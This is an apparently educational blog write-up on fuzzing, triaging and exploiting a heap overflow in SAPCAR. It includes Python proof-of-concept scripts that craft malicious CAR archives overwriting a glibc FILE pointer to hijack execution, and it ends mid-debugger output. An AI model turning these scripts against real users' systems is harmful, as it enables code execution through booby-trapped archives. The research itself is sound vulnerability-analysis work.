SAPCAR Heap Buffer Overflow: From crash to exploit

In this blog post, we will cover the analysis and exploitation of a simple heap buffer overflow found in SAPCAR.

SAP published security note #2441560 classifying the issue as "Potential Denial of Service". This post is our attempt to show that code execution is not only possible but also relatively easy to achieve. The idea is to provide a (hopefully!) cohesive example for other beginners that might be interested in binary exploitation. We will see one possible approach to make sense of a few hundred crashes obtained through fuzzing, how to identify the root cause of the bug, and how to determine its exploitability. Afterwards, we will develop an exploit using the old and well-known file pointer overwrite technique. The last section will go into some more detail about a relevant mitigation implemented in glibc 2.24.

We consider this post to be merely educational, as mounting an attack against a SAP system administrator would require a more reliable exploit (more details are presented in section 4.4).

About the vulnerable software

SAPCAR is a command line utility to work with SAR and CAR archives, which are proprietary archive file formats used by SAP. SAP usually distributes software and packages using this format.

The bug covered in this blog post affects version 721.510 of SAPCAR. Other products and versions might be affected too, but we only tested this particular version.

Crash analysis

The starting point was a set of 507 files that made the SAPCAR binary crash, all of them graciously provided by @martingalloar. The crashes were found using the honggfuzz fuzzer. In particular, the fuzzer was testing the archive contents listing feature, which is invoked with the -tvf command line arguments.

The file names created by honggfuzz contain some relevant information about the crash, such as the program counter register address (which instruction was being executed at the time of the crash), and the description of which signal terminated the process. A sample file looks like this:


A quick inspection of the crashes showed that the same PC (program counter) values were repeated many times. This is an indication that the number of unique crashes might be lower than the number of crashing files. The exact number of unique PC addresses can be determined with the following command:

$ ls | cut -d '.' -f 3 | uniq | wc -l

This is good news. We are dealing with 13 different crashing points instead of 507.
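
The same grouping can be sketched in Python. This is only an illustration: it assumes, like the cut command above, that the PC is the third dot-separated field of each file name, and the sample names below are hypothetical.

```python
from collections import Counter

def count_by_pc(filenames):
    """Count crash files per program counter (third dot-separated field)."""
    pcs = Counter()
    for name in filenames:
        fields = name.split(".")
        if len(fields) >= 3:
            pcs[fields[2]] += 1
    return pcs

# Hypothetical file names, used only to illustrate the grouping.
sample = [
    "SIGSEGV.PC.7ffff6bc092a.STACK.0.fuzz",
    "SIGSEGV.PC.7ffff6bc092a.STACK.1.fuzz",
    "SIGABRT.PC.40c58b.STACK.2.fuzz",
]
counts = count_by_pc(sample)
print(len(counts), "unique PC values")
```

Unlike uniq, the counter does not depend on the input being sorted, and it also tells us how many files hit each crashing point.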

Triaging crashes

The next logical step is to determine where and why each of the input files makes the binary crash. For 13 crashes, we could just run the program attached to a debugger and inspect the registers and memory layout at the time of the crash. However, it would be nice to extend this approach to handle a larger number of input files.

Luckily for us, there are a couple of tools that can assist us in this endeavor. One of them is the exploitable plugin for gdb. This plugin attempts to classify crashes by severity and likelihood of exploitability. In order to do this, it relies on a set of heuristics that analyze the state of the application that is being debugged.

The exploitable plugin still requires us to run each of the crashing files through gdb. In an attempt to automate this process, we will rely on the crashwalk utility developed by Ben Nagy. It still uses the same gdb plugin, but it eases the task of processing a large number of crashes, providing access to the results in various formats. Installation steps follow:

$ git clone
$ sudo apt-get install golang-go
$ export GOPATH=$HOME/crashwalk/
$ go get -u
$ mkdir src
$ git clone src/exploitable

Crashwalk had some issues picking up the file names as they were, so we did a quick renaming of the crashes to avoid problematic characters and ran the tool:

$ ./crashwalk/bin/cwtriage -root crashes/ -match lala -- ./sapcar_721.510_linux_x86_64 -tvf @@

cwtriage will output results for each crash file, and store everything in the crashwalk.db database by default. We can then query this database using cwdump.

The output includes a classification of the exploitability of the bug. Of course it is not guaranteed and just based on the heuristics used by the exploitable plugin, but it is still a great way to prioritize analysis. We are interested in exploitable bugs, so let's query the crashwalk database to see if there are any:

$ ./crashwalk/bin/cwdump crashwalk.db | sed -n -e '/Classification: EXPLOITABLE/,/END SUMMARY/ p'
Classification: EXPLOITABLE
Hash: f5c06ffc7aa3f42a736f4bb7ea700ef9.5f3bf91c3626b65747adc8881231d81b
Command: ./sapcar_721.510_linux_x86_64 -tvf crashes/lala4
Faulting Frame:
   None @ 0x000000000040c58b: in /home/ubuntu/sapcar_721.510_linux_x86_64
Stack Head (7 entries):
   __GI__IO_unsave_markers   @ 0x00007ffff6bc092a: in /lib/x86_64-linux-gnu/ (BL)
   _IO_new_file_close_it     @ 0x00007ffff6bbd872: in /lib/x86_64-linux-gnu/ (BL)
   _IO_new_fclose            @ 0x00007ffff6bb13ef: in /lib/x86_64-linux-gnu/ (BL)
   None                      @ 0x000000000040c58b: in /home/ubuntu/sapcar_721.510_linux_x86_64
   None                      @ 0x000000000041958b: in /home/ubuntu/sapcar_721.510_linux_x86_64
   None                      @ 0x000000000042bc43: in /home/ubuntu/sapcar_721.510_linux_x86_64
   None                      @ 0x000000000043fc66: in /home/ubuntu/sapcar_721.510_linux_x86_64
rax=0x00000000005a8594 rbx=0x00000000005a8594 rcx=0x00007fffffffcb00 rdx=0x0000000000008000 
rsi=0x00007ffff6f07b28 rdi=0x00000000005a8594 rbp=0x0000000000000000 rsp=0x00007fffffffcac8 
 r8=0x0000000000a1c770  r9=0x0000000000000000 r10=0x0000000000000477 r11=0x00007ffff6bb1260 
r12=0x0000000000000000 r13=0x00007ffff0000920 r14=0x0000000000a3070d r15=0x000000000000000e 
rip=0x00007ffff6bc092a efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on destination operand
   Short description: DestAv (8/22)
   Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
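
For larger result sets it can be handy to do the same filtering in a script. The following is a minimal sketch that mirrors the sed range above: it keeps every block that starts at a "Classification: EXPLOITABLE" line and ends at a line containing "END SUMMARY". The sample text and the exact shape of the end marker are assumptions made for the example.

```python
def exploitable_summaries(dump_text):
    """Return the cwdump summaries classified as EXPLOITABLE."""
    summaries = []
    current = None
    for line in dump_text.splitlines():
        if current is None:
            if line.startswith("Classification: EXPLOITABLE"):
                current = [line]
        else:
            current.append(line)
            if "END SUMMARY" in line:
                summaries.append("\n".join(current))
                current = None
    if current is not None:
        # Like sed, keep a trailing block that never saw the end marker.
        summaries.append("\n".join(current))
    return summaries

# Hypothetical cwdump output, shortened for the example.
sample_dump = (
    "Classification: UNKNOWN\n"
    "Hash: aaaa.bbbb\n"
    "---END SUMMARY---\n"
    "Classification: EXPLOITABLE\n"
    "Hash: cccc.dddd\n"
    "---END SUMMARY---\n"
)
found = exploitable_summaries(sample_dump)
print(len(found), "exploitable crash(es)")
```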

We will focus on this input file.
I like the gdb-peda plugin, so I will use it for the following tests. There are more active projects such as gef and pwndbg, but I have not tried them yet.

Running the SAPCAR binary from gdb shows the following output:

RAX: 0x5a8594 (sub    ecx,esi)
RBX: 0x5a8594 (sub    ecx,esi)
RCX: 0x7fffffffcb00 --> 0x5a8594 (sub    ecx,esi)
RDX: 0x8000 
RSI: 0x7ffff6f07b28 --> 0xa2dc30 --> 0x7ffff6f06260 --> 0x0 
RDI: 0x5a8594 (sub    ecx,esi)
RBP: 0x0 
RSP: 0x7fffffffcaf8 --> 0x7ffff6bbd872 (<_IO_new_file_close_it+50>:    test   BYTE PTR [rbx+0x74],0x20)
RIP: 0x7ffff6bc092a (<__GI__IO_unsave_markers+10>:    mov    QWORD PTR [rdi+0x60],0x0)
R8 : 0xa2dc40 --> 0xa304e0 --> 0x0 
R9 : 0x0 
R10: 0x477 
R11: 0x7ffff6bb1260 (<_IO_new_fclose>:    push   r12)
R12: 0x0 
R13: 0x7ffff0000920 --> 0x474e5543432b2b00 ('')
R14: 0xa3056d --> 0x20000000 ('')
R15: 0xe
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
   0x7ffff6bc0920 <__GI__IO_unsave_markers>:    cmp    QWORD PTR [rdi+0x60],0x0
   0x7ffff6bc0925 <__GI__IO_unsave_markers+5>:    mov    rax,rdi
   0x7ffff6bc0928 <__GI__IO_unsave_markers+8>:    je     0x7ffff6bc0932 <__GI__IO_unsave_markers+18>
=> 0x7ffff6bc092a <__GI__IO_unsave_markers+10>:    mov    QWORD PTR [rdi+0x60],0x0
   0x7ffff6bc0932 <__GI__IO_unsave_markers+18>:    mov    rdi,QWORD PTR [rax+0x48]
   0x7ffff6bc0936 <__GI__IO_unsave_markers+22>:    test   rdi,rdi
   0x7ffff6bc0939 <__GI__IO_unsave_markers+25>:    je     0x7ffff6bc0965 <__GI__IO_unsave_markers+69>
   0x7ffff6bc093b <__GI__IO_unsave_markers+27>:    test   DWORD PTR [rax],0x100
0000| 0x7fffffffcaf8 --> 0x7ffff6bbd872 (<_IO_new_file_close_it+50>:    test   BYTE PTR [rbx+0x74],0x20)
0008| 0x7fffffffcb00 --> 0x5a8594 (sub    ecx,esi)
0016| 0x7fffffffcb08 --> 0x7fffffffcb50 --> 0x7fffffffcfe0 --> 0x7fffffffe1d0 --> 0x7fffffffe3b0 --> 0x5af800 (mov    QWORD PTR [rsp-0x18],rbx)
0024| 0x7fffffffcb10 --> 0xa30510 ("sapevents.dll")
0032| 0x7fffffffcb18 --> 0x7ffff6bb13ef (<_IO_new_fclose+399>:    mov    edx,DWORD PTR [rbx])
0040| 0x7fffffffcb20 --> 0xa1c790 --> 0xa2dc60 --> 0xa30520 --> 0x20 (' ')
0048| 0x7fffffffcb28 --> 0x7fffffffcb50 --> 0x7fffffffcfe0 --> 0x7fffffffe1d0 --> 0x7fffffffe3b0 --> 0x5af800 (mov    QWORD PTR [rsp-0x18],rbx)
0056| 0x7fffffffcb30 --> 0xa30510 ("sapevents.dll")
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__GI__IO_unsave_markers (fp=fp@entry=0x5a8594) at genops.c:1065

There is something interesting here: FILE structures created by fopen normally live on the heap. In this case, however, the file pointer points somewhere into the text segment of the binary:

gdb-peda$ vmmap 0x5a8594
Start              End                Perm    Name
0x00400000         0x007c9000         r-xp    /home/ubuntu/sapcar_721.510_linux_x86_64

Finding where this file pointer is located and inspecting the surrounding memory shows data that looks a lot like the input file contents:

gdb-peda$ find 0x5a8594
Searching for '0x5a8594' in: None ranges
Found 1 results, display max 1 items:
 [heap] : 0xa1d8d0 --> 0x5a8594 (sub    ecx,esi)
gdb-peda$ x/16xg 0xa1d8d0 - 64
0xa1d890:    0x6d942db80cb306f7    0xb31049e79a5e9c99
0xa1d8a0:    0x5bceaebdc9b16ad3    0x05d38708178849d0
0xa1d8b0:    0x39c05825344a4838    0x00000000005b6750
0xa1d8c0:    0xdacaadadcf57bed4    0x4806b9a200000002
0xa1d8d0:    0x00000000005a8594    0x00007ffff6593fdc
0xa1d8e0:    0x00007ffff6594088    0x30302e3220524143
0xa1d8f0:    0x000081b6f6594752    0x0000000000043200
0xa1d900:    0x00007fff00000000    0x0000000035be41f6

A quick grep shows that these values are present in our test file. In particular, they are located at the very end of it:

$ grep -obUaP "\xa2\xb9\x06\x48\x94\x85\x5a" crashes/lala4
$ xxd crashes/lala4 | grep 7720
00007720: da7a 62ed e2a2 b906 4894 855a            .zb.....H..Z

Can we overwrite more data in the heap? A simple test consists of appending content to the input file and re-running the binary:

$ echo AAAABBBB >> crashes/lala4

This time the crash happens in _IO_feof, and we fully control the value of the file pointer:

Stopped reason: SIGSEGV
_IO_feof (fp=0x42414141415a8594) at feof.c:35
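
The new pointer value can be reproduced by hand. The sketch below assumes that the last three bytes of the original file (94 85 5a in the xxd output) land in the low bytes of the pointer slot, which is consistent with the first crash, and that the appended bytes follow them in memory.

```python
import struct

original_tail = bytes.fromhex("94855a")  # last three bytes of crashes/lala4
appended = b"AAAABBBB\n"                 # what `echo AAAABBBB >>` adds

# The pointer slot holds the first 8 of these bytes, read as little-endian.
overflow = original_tail + appended
fp = struct.unpack("<Q", overflow[:8])[0]
print(hex(fp))
```

The three original bytes are still there (0x5a8594), followed by four 'A' characters and the first 'B'.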

Finding the root cause of the bug

Inspecting the back-trace of all stack frames with the bt command, we find the function that calls feof:

   0x4386f0:    push   rbp
   0x4386f1:    mov    rbp,rsp
   0x4386f4:    mov    QWORD PTR [rbp-0x8],r13
   0x4386f8:    mov    r13,rdi
   0x4386fb:    mov    QWORD PTR [rbp-0x18],rbx
   0x4386ff:    mov    QWORD PTR [rbp-0x10],r12
   0x438703:    sub    rsp,0x20
   0x438707:    mov    r12,rcx
   0x43870a:    mov    rcx,QWORD PTR [r13+0x18]
   0x43870e:    mov    rdi,rsi
   0x438711:    mov    rbx,rdx
   0x438714:    mov    esi,0x1
   0x438719:    call   0x40b3e0 <fread@plt>
   0x43871e:    cmp    rbx,rax
   0x438721:    mov    QWORD PTR [r12],rax
   0x438725:    je     0x438734
   0x438727:    mov    rdi,QWORD PTR [r13+0x18]
   0x43872b:    call   0x40b340 <feof@plt>

Had the file pointer been overwritten when fread at 0x438719 was called, the program would have crashed in fread instead. There is a good chance that this call to fread is the one actually doing the overwrite.

To verify this, we place a breakpoint in fread and re-run the program. In addition, we want to check what is happening to the original file pointer, so we will place a watchpoint that stops execution whenever it is overwritten. We can get the original address of the file pointer by inspecting the parameters passed to any of the file IO functions before the overwrite.

Breakpoint 2, __GI__IO_fread (buf=0x7fffffffcb10, size=0x1, count=0x2, fp=0xa2da10) at iofread.c:31

gdb-peda$ find 0xa2da10
Searching for '0xa2da10' in: None ranges
Found 1 results, display max 1 items:
[heap] : 0xa1d8d0 --> 0xa2da10 --> 0xfbad2488 
gdb-peda$ watch *0xa1d8d0
Hardware watchpoint 1: *0xa1d8d0

We see the first assignment, which is correct:

Hardware watchpoint 1: *0xa1d8d0
Old value = 0x0
New value = 0xa2da10
0x000000000043859f in ?? ()

And a second write as a result of the overflow:

Hardware watchpoint 1: *0xa1d8d0

Old value = 0xa2da10
New value = 0x415a8594
gdb-peda$ bt
#0  0x00007ffff6c3a680 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
#1  0x00007ffff6bbcf79 in __GI__IO_file_xsgetn (fp=0xa2da10, data=<optimized out>, n=0xb5ef) at fileops.c:1434
#2  0x00007ffff6bb2236 in __GI__IO_fread (buf=<optimized out>, size=0x1, count=0xb5ef, fp=0xa2da10) at iofread.c:38
#3  0x000000000043871e in ?? ()
#4  0x000000000040c01a in ?? ()
#5  0x000000000040dc5f in ?? ()
#6  0x0000000000418e23 in ?? ()
#7  0x000000000042bc43 in ?? ()
#8  0x000000000043fc66 in ?? ()
#9  0x00007ffff6b64830 in __libc_start_main (main=0x43ffb0, argc=0x3, argv=0x7fffffffe498, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe488)
    at ../csu/libc-start.c:291

So, we can see that fread is called to read 0xb5ef bytes, resulting in the file pointer overwrite.
Monitoring what is being read sheds some light on the file structure too.

fread  size          contents
#1     0x8 bytes     File Format / Version = CAR 2.00
#2     0x22 bytes    RG (regular file)
#3     0xd bytes     File name = sapevents.dll
#4     0x2 bytes     Block type - SAPCAR_BLOCK_TYPE_COMPRESSED = "DA"
#5     0x4 bytes     ????
#6     0x2 bytes     Block type - SAPCAR_BLOCK_TYPE_COMPRESSED = "DA"
#7     0x4 bytes     ????
#8     0x2 bytes     Block type - INVALID TYPE = "D>"
#9     0x20 bytes    ????
#10    0xb5ef bytes  User controlled data that will overwrite stuff on the heap

Valid block types are DA, ED, UD, and UE. When the file contains any other identifier, the program reads 32 additional bytes of metadata whose layout we did not fully reverse. However, inspecting the end of the data read at #9 shows that it contains the size of the next fread: the last two bytes (0xef 0xb5) are the little-endian encoding of 0xb5ef.

gdb-peda$ x/32xb 0xa2dc62
0xa2dc62:    0x01    0xac    0xa6    0x08    0x3c    0x27    0xb8    0xc4
0xa2dc6a:    0x62    0x28    0x9d    0x19    0xe2    0xd3    0xa3    0xc3
0xa2dc72:    0xcb    0x94    0x5d    0xec    0x02    0x36    0x7b    0x9f
0xa2dc7a:    0x52    0xb8    0x2a    0xfb    0x1f    0x6a    0xef    0xb5

Editing those bytes in the input file allows us to control the size passed to fread. The field is 2 bytes wide, so the size can be at most 0xffff.
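
As a quick sanity check, the size can be decoded from the bytes shown in the gdb dump. This is a sketch that assumes the size is a little-endian 16-bit value stored at the very end of the 0x20 bytes, which is what the dump and the fread count suggest.

```python
import struct

# The 0x20 bytes returned by fread #9, copied from the gdb dump above.
metadata = bytes.fromhex(
    "01aca6083c27b8c4"
    "62289d19e2d3a3c3"
    "cb945dec02367b9f"
    "52b82afb1f6aefb5"
)

# Assumption: the trailing two bytes are a little-endian size field.
next_read_size = struct.unpack("<H", metadata[-2:])[0]
print(hex(next_read_size))
```

The decoded value matches the count passed to the fread call that overwrites the file pointer.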
One would expect the program to call malloc with the size it just read. This is not the case, which suggests that it relies on a fixed-size buffer. Monitoring earlier calls to malloc and back-tracing the execution flow from there showed that a fixed 0x1100-byte buffer is allocated before the fread that triggers the issue:

   0x40c01e:    mov    rcx,r14
   0x40c021:    mov    esi,0x1100
   0x40c026:    mov    rdi,r14
   0x40c029:    call   0x4a73a0


   0x4a73a0:    push   rbp
   0x4a73a1:    mov    rbp,rsp
   0x4a73a4:    mov    QWORD PTR [rbp-0x28],rbx
   0x4a73a8:    mov    QWORD PTR [rbp-0x20],r12
   0x4a73ac:    mov    rbx,rcx
   0x4a73af:    mov    QWORD PTR [rbp-0x18],r13
   0x4a73b3:    mov    QWORD PTR [rbp-0x10],r14
   0x4a73b7:    mov    r14,rdi
   0x4a73ba:    mov    QWORD PTR [rbp-0x8],r15
   0x4a73be:    mov    edi,esi
   0x4a73c0:    sub    rsp,0x40
   0x4a73c4:    mov    r12d,esi
   0x4a73c7:    mov    r15,rdx
   0x4a73ca:    call   0x459720


   0x45973d:    mov    r13d,edi
   0x45977d:    movsxd rdi,r13d
   0x459780:    call   0x40b0c0 <malloc@plt>

This is the buffer that is later on passed to fread. The overflow is clear now: we are copying an arbitrary amount of data (up to 0xffff in size) into a buffer of size 0x1100.
We also know that it happens because the program determines a dynamic size based on some metadata located in the input file when the block type is unknown. 
Armed with this knowledge, we can craft a simple exploit to gain code execution.


Heap exploitation is a creative process, with a lot of techniques and voodoo-like tricks that usually depend on being able to trigger (semi) reliable allocations and deallocations. A great resource to learn about these techniques is the how2heap repository that the guys from Shellphish put together.

However, in this case exploitation is very straightforward. We know we can overwrite a pointer to a FILE structure, which is sufficient to gain code execution. The technique is very old, but it still remains relevant.

There is a great writeup by Kees Cook on abusing the FILE structure, which you should definitely read.

The main idea is that when a new FILE structure is allocated as a result of a call to fopen, glibc actually allocates a larger internal structure (struct _IO_FILE_plus) that contains the struct _IO_FILE followed by a pointer to a table of type _IO_jump_t, which stores the function pointers associated with the different file operations:

Breakpoint 1, __GI__IO_fread (buf=0xa1d8e8, size=0x1, count=0x8, fp=0xa2da10) at iofread.c:31
gdb-peda$ p *fp
$2 = {
  _flags = 0xfbad2488, 
  _IO_read_ptr = 0x0, 
  _IO_read_end = 0x0, 
  _IO_read_base = 0x0, 
  _IO_write_base = 0x0, 
  _IO_write_ptr = 0x0, 
  _IO_write_end = 0x0, 
  _IO_buf_base = 0x0, 
  _IO_buf_end = 0x0, 
  _IO_save_base = 0x0, 
  _IO_backup_base = 0x0, 
  _IO_save_end = 0x0, 
  _markers = 0x0, 
  _chain = 0x7ffff6f08540 <_IO_2_1_stderr_>, 
  _fileno = 0x3, 
  _flags2 = 0x0, 
  _old_offset = 0x0, 
  _cur_column = 0x0, 
  _vtable_offset = 0x0, 
  _shortbuf = "", 
  _lock = 0xa2daf0, 
  _offset = 0xffffffffffffffff, 
  _codecvt = 0x0, 
  _wide_data = 0xa2db00, 
  _freeres_list = 0x0, 
  _freeres_buf = 0x0, 
  __pad5 = 0x0, 
  _mode = 0x0, 
  _unused2 = '\000' <repeats 19 times>
}
gdb-peda$ x/xg 0xa2da10 + sizeof(*fp)
0xa2dae8:    0x00007ffff6f066e0
gdb-peda$ x/xg 0x00007ffff6f066e0
0x7ffff6f066e0 <_IO_file_jumps>:    0x0000000000000000
gdb-peda$ p _IO_file_jumps
$6 = {
  __dummy = 0x0, 
  __dummy2 = 0x0, 
  __finish = 0x7ffff6bbd9c0 <_IO_new_file_finish>, 
  __overflow = 0x7ffff6bbe730 <_IO_new_file_overflow>, 
  __underflow = 0x7ffff6bbe4a0 <_IO_new_file_underflow>, 
  __uflow = 0x7ffff6bbf600 <__GI__IO_default_uflow>, 
  __pbackfail = 0x7ffff6bc0980 <__GI__IO_default_pbackfail>, 
  __xsputn = 0x7ffff6bbd1e0 <_IO_new_file_xsputn>, 
  __xsgetn = 0x7ffff6bbcec0 <__GI__IO_file_xsgetn>, 
  __seekoff = 0x7ffff6bbc4c0 <_IO_new_file_seekoff>, 
  __seekpos = 0x7ffff6bbfa00 <_IO_default_seekpos>, 
  __setbuf = 0x7ffff6bbc430 <_IO_new_file_setbuf>, 
  __sync = 0x7ffff6bbc370 <_IO_new_file_sync>, 
  __doallocate = 0x7ffff6bb1180 <__GI__IO_file_doallocate>, 
  __read = 0x7ffff6bbd1a0 <__GI__IO_file_read>, 
  __write = 0x7ffff6bbcb70 <_IO_new_file_write>, 
  __seek = 0x7ffff6bbc970 <__GI__IO_file_seek>, 
  __close = 0x7ffff6bbc340 <__GI__IO_file_close>, 
  __stat = 0x7ffff6bbcb60 <__GI__IO_file_stat>, 
  __showmanyc = 0x7ffff6bc0af0 <_IO_default_showmanyc>, 
  __imbue = 0x7ffff6bc0b00 <_IO_default_imbue>
}
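
To see why the vtable pointer sits at fp + sizeof(*fp), the layout can be modelled with Python's struct module. This is a rough sketch for x86-64 and glibc 2.23 only: the field list follows the gdb output above, and the two "4x" padding entries are our assumption about how the compiler aligns the structure.

```python
import struct

# (field name, struct format); None marks assumed compiler padding.
FIELDS = [
    ("_flags", "i"), (None, "4x"),
    ("_IO_read_ptr", "Q"), ("_IO_read_end", "Q"), ("_IO_read_base", "Q"),
    ("_IO_write_base", "Q"), ("_IO_write_ptr", "Q"), ("_IO_write_end", "Q"),
    ("_IO_buf_base", "Q"), ("_IO_buf_end", "Q"),
    ("_IO_save_base", "Q"), ("_IO_backup_base", "Q"), ("_IO_save_end", "Q"),
    ("_markers", "Q"), ("_chain", "Q"),
    ("_fileno", "i"), ("_flags2", "i"),
    ("_old_offset", "q"),
    ("_cur_column", "H"), ("_vtable_offset", "b"), ("_shortbuf", "1s"),
    (None, "4x"),
    ("_lock", "Q"), ("_offset", "q"),
    ("_codecvt", "Q"), ("_wide_data", "Q"),
    ("_freeres_list", "Q"), ("_freeres_buf", "Q"),
    ("__pad5", "Q"), ("_mode", "i"), ("_unused2", "20s"),
]

def field_offsets(fields):
    """Return ({field: offset}, total size) for a packed field list."""
    offsets = {}
    position = 0
    for name, fmt in fields:
        if name is not None:
            offsets[name] = position
        position += struct.calcsize("<" + fmt)
    return offsets, position

offsets, file_size = field_offsets(FIELDS)
fp = 0xa2da10  # file pointer seen in the gdb session
print(hex(file_size))             # size of struct _IO_FILE
print(hex(fp + file_size))        # address holding the vtable pointer
print(hex(offsets["_lock"]))      # offset of the _lock pointer
```

The computed address agrees with the one gdb reported for fp + sizeof(*fp), so a fake structure needs a vtable pointer right after its last field.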

Since we control the file pointer and the data that is read from the input file, we can craft a fake FILE structure and set a custom vtable pointer.
We will use the pysap library to craft CAR archives without hassle. The library can be easily installed with pip:

$ pip install pysap

Overwriting the file pointer

The first step is to overwrite the file pointer with an arbitrary value. We fill the 0x1100-byte buffer, pad the 0x38 bytes of heap between the end of the buffer and the pointer, and then overwrite the pointer itself.

#!/usr/bin/env python

import struct

from scapy.packet import Raw
from pysap.SAPCAR import *

def overwrite_FILE_pointer(address):
    fill_buf = "A" * 0x1100
    gap_to_fp = "B" * 0x38
    fp = struct.pack("<Q", address)
    return fill_buf + gap_to_fp + fp

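def write_exp(data):
    # File that will be stored in the archive
    with open("sapevents.dll", "w") as fd:
        fd.write("Some string to compress")

    f = SAPCARArchive("", mode="wb", version=SAPCAR_VERSION_200)
    # Assumption: pysap's add_file() stores the file as files0[0]
    f.add_file("sapevents.dll")

    # Invalid block type "D>" followed by the overflow data
    f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*32 + "\xd0\xd0" + data))
    # Assumption: pysap's write() saves the archive to disk
    f.write()


def main():
    # Marker value that should show up as fp in the crash
    write_exp(overwrite_FILE_pointer(0x4242424243434343))

if __name__ == "__main__":
    main()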

Run the PoC to create the archive, then run SAPCAR against it under gdb:

Stopped reason: SIGSEGV
_IO_feof (fp=0x4242424243434343) at feof.c:35
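
The 0x38-byte gap can be cross-checked against the addresses seen while debugging. The sketch below assumes the heap layout is the same across runs with ASLR disabled. It takes the buffer address that is hard-coded in the next section (0xa1c798) and the location where gdb found the file pointer (0xa1d8d0).

```python
import struct

BUF_ADDRESS = 0xa1c798  # heap buffer that receives the fread data
BUF_SIZE = 0x1100       # fixed allocation size
GAP_TO_FP = 0x38        # bytes between the buffer end and the FILE pointer
FP_SLOT = 0xa1d8d0      # where gdb's find located the FILE pointer

overwritten_slot = BUF_ADDRESS + BUF_SIZE + GAP_TO_FP
print(hex(overwritten_slot))

# Same layout as overwrite_FILE_pointer(), using bytes literals.
payload = b"A" * BUF_SIZE + b"B" * GAP_TO_FP + struct.pack("<Q", 0x4242424243434343)
print(hex(len(payload)))
```

The payload is 0x1140 bytes long, comfortably below the 0xffff limit imposed by the 2-byte size field.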

Controlling the execution flow

The next step is to store a fake FILE structure followed by a pointer to our vtable. We are running with ASLR disabled for now, so for testing purposes we can rely on a hard-coded buffer address.

#!/usr/bin/env python
import struct

from scapy.packet import Raw
from pysap.SAPCAR import *

BUF_ADDRESS = 0xa1c798
FILE_STRUCT_SIZE = 0xd8  # sizeof(struct _IO_FILE), see the gdb output above

def build_IO_FILE_struct():
    file_struct = ""
    file_struct += struct.pack("<Q", 0x80018001) # _flags
    file_struct += struct.pack("<Q", 0x41414141) # _IO_read_ptr
    file_struct += struct.pack("<Q", 0x42424242) # _IO_read_end
    file_struct += struct.pack("<Q", 0x43434343) # _IO_read_base
    file_struct += struct.pack("<Q", 0x44444444) # _IO_write_base
    file_struct += struct.pack("<Q", 0x45454545) # _IO_write_ptr
    file_struct += struct.pack("<Q", 0x46464646) # _IO_write_end
    file_struct += struct.pack("<Q", 0x47474747) # _IO_buf_base
    file_struct += struct.pack("<Q", 0x48484848) # _IO_buf_end
    file_struct += struct.pack("<Q", 0x49494949) # _IO_save_base
    file_struct += struct.pack("<Q", 0x50505050) # _IO_backup_base
    file_struct += struct.pack("<Q", 0x51515151) # _IO_save_end
    file_struct += struct.pack("<Q", 0x52525252) # _markers
    file_struct += struct.pack("<Q", 0x53535353) # _chain
    file_struct += struct.pack("<L", 0x54545454) # _fileno
    file_struct += struct.pack("<L", 0x55555555) # _flags2
    file_struct += struct.pack("<Q", 0x56565656) # _old_offset
    file_struct += struct.pack("<H", 0x5757)     # _cur_column
    file_struct += struct.pack("<H", 0x58)       # _vtable_offset
    file_struct += struct.pack("<L", 0x59595959) # _shortbuf
    file_struct += struct.pack("<Q", 0x60606060) # _lock
    file_struct += struct.pack("<Q", 0x61616161) # _offset
    file_struct += struct.pack("<Q", 0x62626262) # _codecvt
    file_struct += struct.pack("<Q", 0x63636363) # _wide_data
    file_struct += struct.pack("<Q", 0x64646464) # _freeres_list
    file_struct += struct.pack("<Q", 0x65656565) # _freeres_buf
    file_struct += struct.pack("<Q", 0x66666666) # __pad5
    file_struct += struct.pack("<L", 0x67676767) # _mode
    file_struct += "A" * 20                      # _unused2

    return file_struct

def build_IO_jump_t_vtable():
    vtable = ""
    vtable += struct.pack("<Q", BUF_ADDRESS + 2 * FILE_STRUCT_SIZE + 8)
    vtable += struct.pack("<Q", 0x41424344) * 21
    return vtable

def overwrite_FILE_pointer(address):
    fake_structure = build_IO_FILE_struct() * 2
    vtable = build_IO_jump_t_vtable()
    fill_buf = "A" * (0x1100 - len(fake_structure) - len(vtable))
    gap_to_fp = "B" * 0x38
    fp = struct.pack("<Q", address)
    return fake_structure + vtable + fill_buf + gap_to_fp + fp

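def write_exp(data):
    # File that will be stored in the archive
    with open("sapevents.dll", "w") as fd:
        fd.write("Some string to compress")

    f = SAPCARArchive("", mode="wb", version=SAPCAR_VERSION_200)
    # Assumption: pysap's add_file() stores the file as files0[0]
    f.add_file("sapevents.dll")

    # Invalid block type "D>" followed by the overflow data
    f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*32 + "\xd0\xd0" + data))
    # Assumption: pysap's write() saves the archive to disk
    f.write()

def main():
    # Point the FILE pointer at the second copy of the fake structure
    write_exp(overwrite_FILE_pointer(BUF_ADDRESS + FILE_STRUCT_SIZE))

if __name__ == "__main__":
    main()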

We create the new archive and run the binary again. This time we will control RIP and redirect execution as expected:

Stopped reason: SIGSEGV
0x0000000041424344 in ?? ()
gdb-peda$ bt
#0  0x0000000041424344 in ?? ()
#1  0x00007ffff6bb129f in _IO_new_fclose (fp=0xa1c870) at iofclose.c:62
#2  0x000000000040c58b in ?? ()
#3  0x000000000041958b in ?? ()
#4  0x000000000042bc43 in ?? ()
#5  0x000000000043fc66 in ?? ()
#6  0x00007ffff6b64830 in __libc_start_main (main=0x43ffb0, argc=0x3, argv=0x7fffffffe488, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe478)
    at ../csu/libc-start.c:291

We can also inspect the file pointer to check that our fake structure was populated correctly (see _IO_new_fclose in the excerpt above):

gdb-peda$ p *(FILE *)0xa1c870
$1 = {
  _flags = 0x80018001, 
  _IO_read_ptr = 0x41414141 <error: Cannot access memory at address 0x41414141>, 
  _IO_read_end = 0x42424242 <error: Cannot access memory at address 0x42424242>, 
  _IO_read_base = 0x43434343 <error: Cannot access memory at address 0x43434343>, 
  _IO_write_base = 0x44444444 <error: Cannot access memory at address 0x44444444>, 
